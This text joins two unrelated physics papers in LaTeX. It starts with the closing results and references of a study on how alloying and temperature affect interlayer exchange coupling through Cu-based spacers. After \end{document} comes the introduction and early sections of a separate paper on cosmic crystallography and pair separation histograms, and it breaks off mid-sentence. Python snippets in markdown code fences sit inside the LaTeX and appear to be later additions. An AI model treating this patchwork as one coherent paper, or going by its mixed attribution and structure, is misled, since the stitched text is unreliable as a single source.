As an illustration, in Fig.~1 we plot the discrete Fourier transformations
({\it Drchal et al.}, 1996) of $N^{2} \, {\cal E}_x(N,T)$ with respect
to $N$, ${\cal E}_x(q,T)$, as a function of variables $q$ and $T$.
The discrete Fourier transformation on a subset $N \in 10-50$ which avoids
the preasymptotic region is employed here.
The positions of peaks of $q=q_m$ then determine oscillation periods
$p=2 \pi/q_m$, while $|{\cal E}_x|$ give oscillation amplitudes
({\it Drchal et al.}, 1996).
In particular, one can see how the modification of the Fermi surface
due to alloying changes the temperature dependence of the IEC, i.e.,
the coefficient $c$ in Eq.(\ref{eq_model}).
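The extraction of oscillation periods from the discrete Fourier transformation of $N^2 {\cal E}_x(N,T)$ can be illustrated on a toy signal; the sketch below uses a single cosine with the $N^{-2}$ envelope and the Cu short-period wave number (an illustrative construction, not the {\it ab initio} data).

```python
import cmath, math

# Toy signal: a single short-period oscillation with the 1/N^2 envelope,
# E_x(N) ~ cos(q_m * N) / N**2, sampled at integer spacer thicknesses N = 10..50.
q_m = 2.48                      # wave number of the Cu short-period oscillation
Ns = range(10, 51)
signal = [math.cos(q_m * N) / N**2 for N in Ns]

# Discrete Fourier transform of N^2 * E_x(N) on a fine q grid in (0, pi).
def amplitude(q):
    return abs(sum(N**2 * s * cmath.exp(1j * q * N) for N, s in zip(Ns, signal)))

qs = [0.1 + i * (math.pi - 0.1) / 2000 for i in range(2001)]
q_peak = max(qs, key=amplitude)
print(f"peak at q = {q_peak:.3f}, period p = 2*pi/q = {2*math.pi/q_peak:.2f} MLs")
```

The peak position recovers $q_m$, and hence the period $p = 2\pi/q_m \approx 2.53$~MLs quoted for the pure Cu spacer.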
The following conclusions can be drawn from numerical results:
(i) The non-random case (Cu) exhibits the period $p \approx 2.53$~MLs
(monolayers) or, equivalently, $q_m \approx 2.48$ in accordance with
previous calculations ({\it Drchal et al.}, 1996).
In accordance with ({\it Kudrnovsk\'y et al.}, 1996), the periods of
oscillations for the Cu$_{75}$Zn$_{25}$ alloy are shifted towards larger
periods ($p \approx 3.05$~MLs), towards smaller periods for the
Cu$_{85}$Ni$_{15}$ alloy ($p \approx 2.27$~MLs), while they remain almost
unchanged for the equiconcentration CuAu alloy spacer ($p \approx 2.36$~MLs);
(ii) The periods of oscillations are temperature independent because
the electronic structure or, alternatively, spanning vectors are
temperature independent;
(iii) The amplitudes exhibit a strong temperature dependence
in agreement with predictions of model theories ({\it Bruno}, 1995).
In particular, our results agree reasonably well with those of Fig.~3
in ({\it d'Albuquerque e Castro et al.}, 1996) for the case of ideal
Cu spacer.
(iv) For alloy spacers at $T=0$ we mention, in particular, the dependence
$N^{-2}$ of the oscillation amplitudes on the spacer thickness $N$ for
CuNi and CuAu alloy spacers, while additional exponential damping due to
disorder was found for the CuZn alloy.
This indicates a finite lifetime of states at the Fermi energy for
${\bf k}_{\|}$-vectors corresponding to short-period oscillations for this
case and only a weak damping for CuAu and CuNi alloys;
(v) Finally, the effect of temperature (the factor $t(N,T)$ in
Eq.~(\ref{eq_model})) is similar for a pure Cu-spacer, CuNi and CuAu alloys,
but it is much smaller for the case of CuZn alloys.
The effect of temperature, similarly to alloying, is to broaden spanning
vectors of the Fermi surface ({\it Bruno}, 1995).
If the damping due to alloying is non-negligible, the combined effect
of disorder and temperature leads to a relatively smaller (compared to
the case $T=$0~K) suppression of the oscillation amplitude with the
temperature.
\bigskip \noindent {\bf Acknowledgment}
This work is a part of activities of the Center for Computational
Material Science sponsored by the Academy of Sciences of the Czech
Republic.
Financial support for this work was provided by the Grant Agency
of the Czech Republic (Project No. 202/97/0598), the Grant Agency
of the Academy of Sciences of the Czech Republic (Project A1010829), the
Project 'Scientific and Technological Cooperation between Germany and
the Czech Republic', the Center for the Computational Materials Science
in Vienna (GZ 45.422 and GZ 45.420), and the TMR Network 'Interface
Magnetism' of the European Commission (Contract No. EMRX-CT96-0089).
\bigskip \noindent {\bf References} \bigskip
\noindent {\it J.~d'Albuquerque e Castro, J.~Mathon, M.~Villeret,
and A.~Umerski}, 1996, Phys. Rev. B {\bf 53}, R13306.
\noindent {\it P.~Bruno}, 1995, Phys. Rev. B {\bf 52}, 411.
\noindent {\it P.~Bruno, J.~Kudrnovsk\'y, V.~Drchal, and I.~Turek},
1996, Phys. Rev. Lett. {\bf 76}, 4254.
\noindent {\it V.~Drchal, J.~Kudrnovsk\'y, I.~Turek, and P.~Weinberger},
1996, Phys. Rev. B {\bf 53}, 15036.
\noindent {\it V.~Drchal, J.~Kudrnovsk\'y, P.~Bruno, and P.~Weinberger},
1998 (in preparation).
\noindent {\it J.~Kudrnovsk\'y, V.~Drchal, P.~Bruno, I.~Turek, and
P.~Weinberger}, 1996, Phys. Rev. B {\bf 54}, R3738.
\noindent {\it M.~van~Schilfgaarde, F.~Herman, S.S.P.~Parkin, and
J.~Kudrnovsk\'y}, 1995, Phys. Rev. Lett. {\bf 74}, 4063.
\end{document}
\label{intro}
\setcounter{equation}{0}
Current observational data favour Friedmann-Lema\^{\i}tre (FL)
cosmological models as approximate descriptions of our universe at
least since the recombination time. These descriptions are, however,
only local and do not f\/ix the global shape of our universe.
Despite the inf\/initely many possibilities for
its global topology, it is often assumed that spacetime is
simply connected leaving aside the hypothesis, very rich in
observational and physical consequences, that the universe may
be multiply connected, and compact even if it has zero or
negative constant curvature. Since the hypothesis that
our universe has a non-trivial topology has not been excluded,
it is worthwhile testing it (see~\cite{CosmicTop}~--~\cite{ZelNov83}
and references therein).
The most immediate consequence of the hypothesis of multiply-%
connectedness of our universe is the possibility of observing
multiple images of cosmic objects, such as galaxies, quasars, and
the like. Thus, for example, consider the available catalogues of
quasars with redshifts ranging up to $z \approx 4$ which, in
the Einstein-de Sitter cosmological model, corresponds to a
comoving distance $d \approx 3300 \, h^{-1} Mpc$ from us ($h$
is the Hubble constant in units of $100 \, km \, s^{-1}
Mpc^{-1}$). Then, roughly speaking, if our universe is \emph{small}
in the sense that it has closed geodesics of length less than
$2 d$, some of the observed quasars may actually be images of
the same cosmic object.%
\footnote{Note that we are not considering problems which
arise from the possibly short lifetime of quasars. Actually,
this is irrelevant for the point we want to illustrate
with this example.}
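The quoted figure $d \approx 3300 \, h^{-1} Mpc$ can be sketched numerically; the snippet below assumes the standard Einstein-de Sitter comoving-distance formula $d = (2c/H_0)\,[1 - (1+z)^{-1/2}]$ underlies the quoted number, with $H_0 = 100\,h$ km s$^{-1}$ Mpc$^{-1}$ so that $d$ comes out in units of $h^{-1}$ Mpc.

```python
import math

# Comoving distance to redshift z in the Einstein-de Sitter model:
# d = (2c/H0) * (1 - 1/sqrt(1+z)); with H0 = 100 h km/s/Mpc, d is in h^-1 Mpc.
c_km_s = 299792.458          # speed of light in km/s

def comoving_distance(z):
    return 2 * (c_km_s / 100.0) * (1.0 - 1.0 / math.sqrt(1.0 + z))

print(f"d(z=4) = {comoving_distance(4.0):.0f} h^-1 Mpc")   # roughly 3300 h^-1 Mpc
```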
More generally, in considering discrete astrophysical sources,
the \emph{observable universe} can be viewed as that part of
the universal covering manifold $\widetilde{M}(t_0)\,$ of the
$t=t_0$ space-like section $M(t_0)$ of spacetime, causally
connected to an image of our position since the moment of
matter-radiation decoupling (here $t_0$ denotes present time)
while, given a catalogue of cosmic sources, the
\emph{observed universe} is that part of the observable
universe which contains all the sources listed in the catalogue.
So, for instance, using quasars as cosmic sources the observed
universe for a catalogue covering the entire sky is a ball with
radius approximately half the radius of the observable universe
(in the Einstein-de Sitter model). If the universe $M(t_0)$ is
small enough in the above-specif\/ied sense, then there may be
\emph{copies} of some cosmic objects in the observed universe,
and an important goal in observational cosmic topology is to
develop methods to determine whether these copies exist.
Direct searching for multiple images of cosmic objects is not a
simple problem. Indeed, due to the f\/initeness of the speed of
light two images of a given object at dif\/ferent distances
correspond to dif\/ferent epochs of its life. Moreover, in
general the two images are seen from dif\/ferent directions.
So one ought to be able to f\/ind out whether two images
correspond to dif\/ferent objects, or correspond to the same
object seen at two dif\/ferent stages of its evolution and at
two dif\/ferent orientations. The problem becomes even more
involved when one takes into account that observational and
selection ef\/fects may also be dif\/ferent for these distinct
images.
One way to handle these dif\/f\/iculties is to use suitable
statistical analysis applied to catalogues. Cosmic crystallography%
~\cite{LeLaLu} is a promising statistical method which looks for
distance correlations between cosmic sources using pair separation
histograms (PSH), i.e. graphs of the number of pairs of sources
versus the squared distance between them. These correlations are
expected to arise from the isometries of the covering group of
$M(t_0)$ which give rise to the (observed) multiple images, and
have been claimed to manifest as sharp peaks~\cite{LeLaLu}, also
called spikes. Moreover, the positions and relative amplitudes
of these spikes have also been thought to be f\/ingerprints
of the shape of the universe (see, however, the references%
~\cite{LeLuUz}~--~\cite{FagGaus}, and also
sections~\ref{fres} and~\ref{concl} of the present paper).
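The origin of such distance correlations can be illustrated with a toy catalogue: seed objects plus one image of each, generated by a pure translation. Every pair formed by an object and its own translated image is separated by exactly the translation length, producing a spike in the histogram of squared separations. The sketch below is schematic only: the unit box, the translation vector, and the number of sources are arbitrary choices, and no cosmological geometry or covering group is modelled.

```python
import random

# Toy "catalogue": n seed objects in a unit box, each with one extra image
# generated by a pure translation g: x -> x + (0.5, 0, 0).  Every pair
# (object, its own translated image) has squared separation exactly 0.25,
# so the histogram of squared separations acquires a spike in that bin.
random.seed(1)
n = 200
seeds = [(random.random(), random.random(), random.random()) for _ in range(n)]
sources = seeds + [(x + 0.5, y, z) for (x, y, z) in seeds]

def sq_dist(a, b):
    return sum((u - v) ** 2 for u, v in zip(a, b))

pairs = [sq_dist(sources[i], sources[j])
         for i in range(len(sources)) for j in range(i + 1, len(sources))]
spike = sum(1 for d2 in pairs if abs(d2 - 0.25) < 1e-9)
print(f"{len(pairs)} pairs in total, {spike} at the exact squared separation 0.25")
```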
It should be emphasized that just by examining a single PSH
one cannot at all decide whether a particular spike is of
topological origin or simply arises from statistical f\/luctuations.
Actually, depending on the accuracy of the simulation one can obtain
PSH's with hundreds of sharp peaks of purely statistical origin among just a
few spikes of topological nature. Thus, it is of indisputable importance
to perform a theoretical statistical analysis of the distance
correlations in the PSH's at least to have a criterion for
revealing the ultimate origin of the spikes that arise
in the PSH's and pave the way for further ref\/inements of the
crystallographic method.
In this work, by using the probability theory we derive the
expression~(\ref{EPSH2}) for the expected pair separation histogram
(EPSH) of comparable catalogues with the same number of sources and
corresponding to any complete 3-manifold of constant curvature.
The EPSH, which is essentially a PSH from which the statistical noise
has been withdrawn, is derived in a very general topological-geometrical%
-observational setting.
It turns out that the EPSH built from a multiply connected manifold is
an EPSH in which the contributions arising from the correlated images
were withdrawn, plus a term that consists of
a sum of individual contributions from each covering isometry.
{}From the EPSH~(\ref{EPSH2}) we extract its major consequence,
namely that the sharp peaks (or spikes) of topological nature in
individual pair separation histograms are due to Clif\/ford
translations, whereas all other isometries manifest as tiny
deformations of the PSH of the corresponding universal covering
manifold.
This relevant consequence holds for all Robertson-Walker (RW) spacetimes
and in turn gives rise to two others: (i) that Euclidean distinct manifolds
which have the same translations in their covering groups present
the same spike spectra of topological nature. So, the set of topological
spikes (their positions and relative amplitudes) in the PSH alone is not
suf\/f\/icient for distinguishing these compact f\/lat manifolds, making
clear that even if the universe is f\/lat ($\Omega_{tot}=1$) the spike
spectrum is not enough for determining its global shape; and
(ii) that individual PSH's corresponding to hyperbolic 3-manifolds
exhibit no spikes of topological origin, since there are no Clif\/ford
translations in the hyperbolic geometry.
These two corollaries ensure that cosmic crystallography, as originally
formulated, is not a conclusive method for unveiling the shape of the
universe.
As a way to reduce the statistical f\/luctuations in individual
PSH's so as to unveil the contributions of non-translational
isometries to the topological signature, we introduce the
mean pair separation histogram (MPSH) and show that
it is a suitable approximation for the EPSH.
Moreover, we emphasize that the use of MPSH's is restricted
to simulated catalogues due to the unsurmountable practical
dif\/f\/iculties in constructing several comparable catalogues
of real sources.
The lack of spikes of topological origin in PSH's of multiply connected
hyperbolic 3-manifolds has also been found in histograms for the specif\/ic
cases of Weeks~\cite{LeLuUz} and one of the Best~\cite{FagGaus} manifolds,
making apparent that, within the degree of accuracy of the corresponding
plots, the above corollary (ii) holds for these specif\/ic cases.
Concerning these references, we also discuss the connection between
our results and theirs~\cite{LeLuUz,FagGaus}. Further, we point out
the limitation of the set of conclusions one can draw from
such graphs by using, e.g., the specif\/ic PSH shown in f\/ig.~1 of%
~\cite{Fagundes-Gausmann}. The possible origins for the
spikes in PSH's are also discussed, and it is shown that one can
distinguish between statistical sharp peaks (noise) and topological
spikes only through the use of the rather general results obtained
in this article.
The plan of this paper is as follows. In the next section we
describe what a catalogue of cosmic sources is in the context of
Robertson-Walker (RW) spacetimes, and introduce some relevant
def\/initions to set our framework and make our paper as accurate
and self-contained as possible.
In the third section we describe how to construct a PSH from a
given catalogue (either real or simulated), and discuss
qualitatively how distance correlations arise in multiply
connected RW universes. In the fourth section we f\/irst discuss the
concept of \emph{expected} pair separation histogram (EPSH) and
derive its explicit expression in a very general
topological-geometrical-observational setting.
In the f\/ifth section we use the expression for the EPSH obtained
in section~\ref{pshexp} to derive its most general consequence,
namely that spikes of topological origin in PSH's are due to
\emph{translations} alone. We proceed by analyzing how this general
result af\/fects PSH's built from Euclidean and hyperbolic manifolds,
and derive two relevant consequences regarding these classes of manifolds.
We also present in that section the MPSH as a simple approach
aiming at reducing the statistical f\/luctuations in PSH's
so that the contributions from non-translational isometries
become apparent.
In section~\ref{concl} we summarize our conclusions,
brief\/ly indicate possible approaches for further
investigations, and f\/inally discuss the connection between
ours and the results those reported in~\cite{LeLuUz}
and~\cite{FagGaus}.
\section{Catalogues in multiply connected RW spacetimes}
\label{catalogs}
\setcounter{equation}{0}
If the universe is multiply connected and one can form
catalogues of cosmic sources with multiple images, the problem
of identifying its shape can be reduced to that of designing
suitable methods for extracting the underlying topological
information from these catalogues. In this section we describe
what a catalogue of cosmic sources is in the context of
RW spacetimes, and discuss under what conditions
catalogues present multiple images. We f\/irst brief\/ly
review some basic properties of locally homogeneous and isotropic
cosmological models, then we formalise the practical process of
construction of catalogues of discrete astrophysical sources,
and f\/inally we specify the conditions for the existence of
multiple images in a catalogue.
\vspace{6mm}
\noindent \textbf{\large Locally homogeneous and isotropic cosmological
models}
\vspace{3mm}
The spacetime arena for a FL cosmological model is a
4-dimensional manifold endowed with a RW metric which
can be written locally as
\begin{equation}
\label{RW-metric}
ds^2 = dt^2 - a^2(t)\, d \sigma^2 \; ,
\end{equation}
where $t$ is a cosmic time, $d\sigma$ is a standard 3-dimensional
hyperbolic, Euclidean or spherical metric, and $a(t)$ is the
scale factor that carries the unit of length. It is usually
assumed that the $t=const$ spatial sections of a RW spacetime
are one of the following simply connected spaces: hyperbolic ($H^3$),
Euclidean ($E^3$), or the 3-sphere ($S^3$), depending on the local
curvature computed from $d \sigma$. Cosmic topology arises when
we relax the hypothesis of simply-connectedness and consider that
the $t=const$ spatial sections may also be any complete multiply
connected 3-manifold of constant curvature (see, for example,
\cite{Wolf,Ellis}).
In this work we shall consider spacetimes of the form
$I \times M$, with $I$ a (possibly inf\/inite) open interval of
the real line, and $M$ a complete constant curvature 3-manifold,
either simply or multiply connected. Actually, a RW spacetime is
a warped product $I \times_a M$ (see, e.g.,~\cite{O'Neill} for
more details) in that, for any instant $t \in I$, the metric in
$M$ is $d\sigma (t) = a(t) d\sigma$. The manifold $M$ equipped
with the metric $d\sigma (t)$ is denoted by $M(t)$, and
is called \emph{comoving space} at time $t$.
So, \emph{comoving geodesics} and \emph{comoving distances}
at some time $t$ mean, respectively, geodesics of $M(t)$ and
distances between points on $M(t)$.
Throughout this article we will omit the time dependence
of $M(t)$ and $\widetilde{M}(t)$ whenever these manifolds
are endowed with the standard metric $d\sigma\,$.
Before proceeding to the discussion of the notion of catalogues
we recall that in a FL cosmological model the energy-matter content
and Einstein's f\/ield equations determine the local curvature of
the spatial sections and the scale factor $a(t)$.
Thus in this process of cosmological modelling within the framework
of general relativity the introduction of particular values for
cosmological parameters ($H_0$, $\Omega_m$, $\Omega_{\Lambda}$,
$q_0$, and so forth) restricts both the
locally homogeneous-and-isotropic 3-geometry, and
the scale factor $a(t)$. However, the concepts and results
we shall introduce and derive in this work hold regardless
of the particular 3-geometry and of the form of $a(t)$ provided
that $a(t)$ is a monotonically increasing function, at least
since the recombination time.
So, there is def\/initely no need to introduce any particular
values for the cosmological parameters unless one intends
to examine the consequences of a specif\/ic class of RW models,
which for the sake of generality we do not aim at in the present
article.
\vspace{6mm}
\noindent \textbf{\large Constructing catalogues}
\vspace{3mm}
To formalise the concept of catalogue of cosmic sources, let us
assume that we know the scale factor $a(t)$, and that it is a
monotonically increasing function. We shall also assume that all
cosmic objects of our interest (also referred to simply as
objects) are pointlike and have long lifetimes so that none
was born or died within the time interval given by $I$. Moreover,
we shall also assume that all objects are comoving, so that their
worldlines have constant spatial coordinates. Although unrealistic,
these assumptions were used implicitly in~\cite{LeLaLu} and%
~\cite{Fagundes-Gausmann} and are very useful to study the
observational consequences of a non-trivial topology for the
universe.
It should be noted that in the process of construction of
catalogues we shall describe below it is assumed that a
particular type of source (clusters of galaxies, quasars, etc.)
or some combination of types (quasars and BL Lac objects, say) is
chosen from the outset.
This approach does not coincide with the exact manner in which
astronomers build catalogues, in that usually they simply
record any sources within their range of interest and (or)
observational limitations. However, the model of constructing
catalogues we shall present relies on the fact that any catalogue
of a specif\/ic type of sources ultimately is a selection of
sources of that type from the hypothetical complete set of sources
which can in principle be observed.
Since we are assuming that all objects are comoving their spatial
coordinates are constant. So, the set of all the objects in $M$ is
given by a list of their present comoving positions, and from this
list one can def\/ine a map
\begin{eqnarray}
\qquad \qquad \mu : M(t_0) & \rightarrow & \{1,0\} \nonumber \\
p \: \mapsto \mu(p) &=& \left\{ \begin{array}
{r@{\quad}l}
1 & \mbox{if there is an object at $p\;$,} \\
0 & \mbox{otherwise}\;.
\end{array} \right.
\end{eqnarray}
The set of objects in $M(t_0)$ is thus $\mu^{-1}(1)$.
This is a discrete set in $M(t_0)$ without accumulation points.
Actually, from any map $\mu : M(t_0) \rightarrow \{1,0\}$ such
that $\mu^{-1}(1)$ is a discrete set without accumulation points,
one may def\/ine a set of objects, namely the set $\mu^{-1}(1)$.
We will further assume in this work that the set of objects is a
representative sample of some well-behaved distribution law in
$M(t_0)$. For our purposes in this article a distribution is
well-behaved if it gives rise to samples of points which are
not concentrated in small regions of $M(t_0)$.
Let $\pi: \widetilde{M}(t_0) \rightarrow M(t_0)$ be the
universal covering projection of $M(t_0)$ and $p$ be an
object, that is $p \in \mu^{-1}(1)$. The set $\pi^{-1}(p)$
is the collection of \emph{copies} of $p$ on $\widetilde{M}(t_0)$.
We will refer to these copies as \emph{topological images} or
simply as images of the object $p$, thus the map $\tilde{\mu}$
def\/ined by the commutative diagram
\\
\setlength{\unitlength}{1.5cm}
\begin{picture}(3,3)
\put(4.15,2){$\widetilde{M}(t_0)$}
\put(4.5,1.85){\vector(0,-1){1}}
\put(4.9,2){\vector(1,-1){1.15}}
\put(4.15,0.5){$M(t_0)$}
\put(4.9,0.57){\vector(1,0){1}}
\put(6,0.5){$\{1,0\}$}
\put(4.25,1.3){$\pi$}
\put(5.3,0.35){$\mu$}
\put(5.6,1.5){$\tilde{\mu}$}
\end{picture}
\\
gives the set of all images on the universal covering manifold
$\widetilde{M}(t_0)$.%
\footnote{A misleading terminology has occasionally been used
in the literature, in which the topological
images are classif\/ied as real and ghosts. In most cases the
expression `real image' refers to the nearest
topological image of a given object,
while the expression `ghost image' refers to any other image
of the same object. There are also cases where `real images'
has been used to refer to the topological images which lie
inside a fundamental polyhedron (FP), while `ghost images' refers
to the images outside the FP. This latter classif\/ication of the
images depends on the choice of the FP which is not at all unique.
Actually, these two usages for the expressions `real image' and
`ghost images' are compatible only if the FP is the Dirichlet
domain with centre at an image of the observer~\cite{Images}.
In both cases the terminology is misleading also because it
may suggest that either the nearest images or the images inside a FP
are somehow special. And yet there is no physical or geometrical
property which supports this distinction. Besides, this terminology
is unnecessary since real objects are represented by points
which lie on the manifold $M$, whereas the points on the universal
covering $\widetilde{M}$ can represent only (topological) images of
these objects --- no image is more \emph{real} than the other,
they are simply (topological) images.}
Indeed, the images of the objects in
$M(t_0)$ are the elements of the set $\tilde{\mu}^{-1}(1)$.
Now suppose we perform a full sky coverage survey for the objects
up to a redshift cutof\/f $z_{max}$. Since we are assuming that
we know the metric $a(t)d\sigma$, we can compute the
distance $R$ corresponding to this redshift cutof\/f and so
determine the observed universe corresponding to this survey.
The ball $\mathcal{U} \subset \widetilde{M}(t_0)$ with radius
$R$ and centred at an image of our position is a representation
of this observed universe.
The f\/inite set $\mathcal{O} = \tilde{\mu}^{-1}(1)\cap \mathcal{U}$
is the set of \emph{observable images} since it contains all the
images which can in principle be observed up to a distance $R$ from
one image of our position.
The set of \emph{observed images} or \emph{catalogue} is a subset
$\mathcal{C} \subset \mathcal{O}$, since owing to several observational
limitations one can hardly record all the images present in the
observed universe. Our observational limitations can be formulated
as \emph{selection rules} which describe how the subset $\mathcal{C}$
arises from $\mathcal{O}$. These selection rules, together with the
distribution law which the objects in $M$ obey, will be referred
to as \emph{construction rules} for the catalogue $\mathcal{C}$.
A good example of construction rules appears in the
simulated catalogue constructed in ref.~\cite{LeLaLu} where a
uniform distribution of points in a 3-torus is assumed together
with a selection rule which dictates how one obtains a catalogue
$\mathcal{C}$ from the set of images in an observed universe
$\mathcal{U}$ subjected to (def\/ined by) the redshift cutof\/f
$z_{max}=0.26$. In that example, to mimic the obscuration ef\/fect
by the galactic plane, they have taken as selection rule that only
the images inside a double cone of aperture $120^\circ$ are observed
or considered. However, in more involved simulations, one can
certainly take other selection rules such as, e.g., a luminosity
threshold, f\/inite lifetimes, obscuration along the line of
sight, and (or) a combination of them.
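To make this kind of selection rule concrete, the following sketch (purely illustrative, not part of the original simulations) implements the double-cone obscuration cut; the choice of the $z$-axis as the cone axis, the half-angle of $60^\circ$ corresponding to an aperture of $120^\circ$, and the array layout are all assumptions made here for illustration.

```python
import numpy as np

def double_cone_selection(points, half_angle_deg=60.0):
    """Keep only images inside a double cone about the z-axis.

    `points` is an (N, 3) array of comoving positions; a point is kept
    when the angle between its position vector and the (+z or -z) axis
    is at most `half_angle_deg`.  An aperture of 120 degrees corresponds
    to a half-angle of 60 degrees (the axis choice is hypothetical).
    """
    points = np.asarray(points, dtype=float)
    r = np.linalg.norm(points, axis=1)
    # |cos| of the angle between the position vector and the z-axis
    cos_axis = np.abs(points[:, 2]) / np.where(r > 0, r, np.inf)
    return points[cos_axis >= np.cos(np.radians(half_angle_deg))]

# Example: a point on the z-axis is kept, one in the xy-plane is cut.
sample = np.array([[0.0, 0.0, 1.0], [1.0, 0.0, 0.0]])
print(len(double_cone_selection(sample)))  # 1
```

Other selection rules (a luminosity threshold, say) would simply compose with this cut as further boolean masks on the same array.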
\begin{sloppypar}
Throughout this work we shall assume that catalogues obey well
def\/ined construction rules, and we shall say that two catalogues
are \emph{comparable} when they are def\/ined by the same
construction rules; even if they have a signif\/icantly
dif\/ferent number of sources and correspond to possibly
dif\/ferent (topologically) 3-manifolds compatible with a given
3-geometry.
According to this def\/inition two comparable catalogues
must correspond to a given RW geometry~(\ref{RW-metric}) with
obviously a well-def\/ined scale factor, and the same underlying
redshift cutof\/f. In other words,
comparable catalogues correspond to a precise set of cosmological
parameters of an observed universe, plus a f\/ixed redshift
cutof\/f. The main motivation for formalising in this way the
concept of comparable catalogues comes from the fact that in
the cosmic crystallographic method we are often interested in
comparing PSH's from simulated catalogues against PSH's from real
catalogues. And real catalogues are limited by a redshift cutof\/f
that is converted into distance through an \emph{ad hoc} choice of
a RW geometry. So, to build simulated catalogues comparable to a
specif\/ic real catalogue, for example, one has to begin with
the precise RW geometry that transforms redshifts into distances
in the real catalogues, and use the same redshift cutof\/f of the
underlying real catalogue.
\end{sloppypar}
Finally, it should be noticed that the above def\/inition for a catalogue
f\/its in with the two basic types of catalogues one usually f\/inds
in practice, namely \emph{real catalogues} (arising from
observations) and \emph{simulated catalogues}, which are generated
under well-def\/ined assumptions that are posed to mimic some
observational limitations and (or) to account for simplif\/ying
hypotheses.
\vspace{6mm}
\noindent \textbf{\large Catalogues with multiple images}
\vspace{3mm}
If $M$ is simply connected then $M$ and $\widetilde{M}$ are the
same, and so there is exactly one image for each object. If $M$
is multiply connected then each object has several images (actually an
inf\/inite number of images in the cases of zero and negative
curvature). Suppose that $M$ is multiply connected, and let $P
\subset \widetilde{M}(t_0)$ be a fundamental domain of $M(t_0)$.
$P$ can always be chosen in such a way that $\tilde{\mu}^{-1}(1)
\cap \partial P = \emptyset$, where $\partial P$ is the boundary
of $P$. If we consider the universal covering
$\widetilde{M}(t_0)$ tessellated by $P$, then clearly
$\tilde{\mu}^{-1}(1)$ presents all the periodicities due to the
covering group $\Gamma$, in the sense that in each copy $gP$ of
the fundamental domain ($\,g \in \Gamma\,$) there is the same
distribution of images as in $P$.
To be able to guarantee the existence of multiple
images in a catalogue $\mathcal{C}$, we shall need the concept of a
\emph{deep enough} survey, which is a survey
whose corresponding observed universe $\mathcal{U}$ has the
property that for some fundamental polyhedron $P$, there are faces
$F$ and $F'$, identif\/ied by an isometry $g \in \Gamma$, and such
that some portions $E \subset F$ and $g(E) \subset F'$ are in the
interior of $\mathcal{U}$. In particular when $M$ is compact with
some fundamental polyhedron lying inside the observed universe
$\mathcal{U}$, then this observed universe corresponds to a deep
enough survey. To f\/ind out whether a full sky coverage survey is
deep enough, in practice, all one needs to do is to determine the
closest image of our position and using the metric $a(t)d \sigma$
compute the redshift $z_{thr}$ corresponding to half of that
distance. Any full sky coverage survey with redshift cutof\/f
$z_{max} > z_{thr}$ is said to be a deep enough survey.%
\footnote{As a matter of fact $z_{thr}$ is the redshift corresponding
to the radius of the inscribed ball in the Dirichlet polyhedron of
$M$ centred in an image of our position~\cite{Images}.}
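As an illustration of this prescription, the sketch below inverts the comoving distance--redshift relation to obtain $z_{thr}$ from the distance to the closest image of our position. A toy Einstein--de Sitter model is assumed here, for which $D(z) = (2c/H_0)\,[1-(1+z)^{-1/2}]$; the value of $H_0$ and the distance to the closest image are hypothetical numbers chosen only for the example.

```python
import math

C_KM_S = 299792.458          # speed of light [km/s]
H0 = 70.0                    # Hubble constant [km/s/Mpc] (illustrative)
D_H = C_KM_S / H0            # Hubble distance [Mpc]

def comoving_distance(z):
    """Comoving distance in an Einstein-de Sitter toy model [Mpc]."""
    return 2.0 * D_H * (1.0 - 1.0 / math.sqrt(1.0 + z))

def redshift_at_distance(d):
    """Analytic inverse of comoving_distance: z such that D(z) = d."""
    return 1.0 / (1.0 - d / (2.0 * D_H)) ** 2 - 1.0

# Suppose the closest topological image of our position lies at a
# comoving distance of 3000 Mpc (hypothetical).  A full sky survey is
# deep enough once its cutoff exceeds z_thr for half that distance.
d_closest = 3000.0
z_thr = redshift_at_distance(d_closest / 2.0)
```

For a realistic RW geometry the inversion would of course use the actual scale factor $a(t)$ rather than this closed-form toy relation.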
When $M$ is multiply connected and the survey is deep enough the
set of observable topological images $\mathcal{O}$ contains multiple
images of some cosmic objects. If, in addition, our observational
capabilities allow the presence of multiple images in
$\mathcal{C}$, then the catalogue has information on the
periodicities due to the covering group $\Gamma$, and so
about the manifold $M$. Every pair of images of one object is
related by an isometry of $\Gamma$. These pairs of images
have been called \emph{gg-pairs}~\cite{LeLaLu}; however,
when referring to them collectively we shall use the term
$\Gamma$-pairs, reserving the name $g$-pair for any pair related
by a specif\/ic isometry $g \in \Gamma$. The $\Gamma$-pairs in
$\mathcal{C}$ give rise to correlations in the positions of the
observed images. The main goal of any statistical approach to
cosmic topology based on discrete sources is to develop methods
to reveal these correlations. Cosmic crystallography is one such
method, and uses PSH's to obtain the \emph{distance correlations}
which arise from these correlations in positions.
It should be stressed that there are two independent conditions
that must be satisf\/ied to have multiple images in a catalogue
$\mathcal{C}$. Firstly, the survey has to be deep enough, so that
in the observed universe $\mathcal{U}$ there must exist multiple
observable images of cosmic objects.
Secondly, the selection rules, which dictate how one obtains a
catalogue $\mathcal{C}$ from the observed universe $\mathcal{U}$,
must not be so restrictive as to rule out the possible multiple
images in $\mathcal{C}$.
Clearly if the survey is not deep enough there is no chance of
having multiple images in $\mathcal{C}$, regardless of the
quality of the observations. On the other hand, even when the
survey is deep enough, if the selection rules are too strict
they may reduce the multiple images in $\mathcal{C}$ to a level
that the detection of topology becomes impossible.
Finally, it should be noticed that when $M$ is simply connected,
to any cosmic object corresponds just one image, so in this case
there is a one-to-one correspondence between images and objects,
and we can simply identify them as the same entity. Since we do
not know a priori whether our universe is simply or multiply
connected, we do not know if we are recording objects or just
images in real catalogues, hence we say that a catalogue is formed
by \emph{cosmic sources}.
\section{Pair separation histograms}
\label{histog}
\setcounter{equation}{0}
The purpose of this section is two-fold. F\/irst we shall
give a brief description of what a PSH is and how to construct
it. Then we shall describe qualitatively how distance
correlations arise in a particular multiply connected universe,
motivating therefore the statistical analysis we will perform in
the next section.
To build a PSH we simply evaluate a suitable one-to-one function
$f$ of the distance $r$ between the cosmic sources of every pair
{}from a given catalogue $\mathcal{C}$, and then count the number
of pairs for which these values $f(r)$ lie within certain
subintervals. These subintervals must form a partition of
the interval $(0,f(2R)]$, where $R$ is the distance from us
to the most distant source in the catalogue. Usually all the
subintervals are taken to be of equal length. The PSH is
just a plot of this counting. Actually, what we shall call
a PSH is a normalized version of this plot. The function
$f$ is usually taken to be the square function, whereas for very
deep catalogues it might be convenient to try some hyperbolic
function if we are, for example, dealing with open FLRW models.
In line with the usage in the literature and to be specif\/ic,
in what follows we will take $f$ to be the square function.
However, it should be emphasized that the results we obtain
here and in the next section hold regardless of this
particular choice.
A formal description of the above procedure is as follows.
Given a catalogue $\mathcal{C}$ of cosmic sources we denote
by $\eta(s)$ the number of pairs of sources whose squared
